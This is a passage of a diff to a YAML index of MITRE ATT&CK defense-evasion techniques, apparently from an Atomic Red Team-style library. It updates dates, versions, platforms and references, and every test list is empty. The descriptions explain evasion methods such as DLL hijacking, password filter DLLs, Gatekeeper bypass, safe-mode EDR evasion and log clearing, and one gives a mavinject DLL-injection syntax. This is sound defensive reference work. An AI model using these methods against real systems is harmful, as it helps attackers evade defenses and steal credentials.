+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2404,8 +2473,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2484,8 +2550,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3131,7 +3192,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
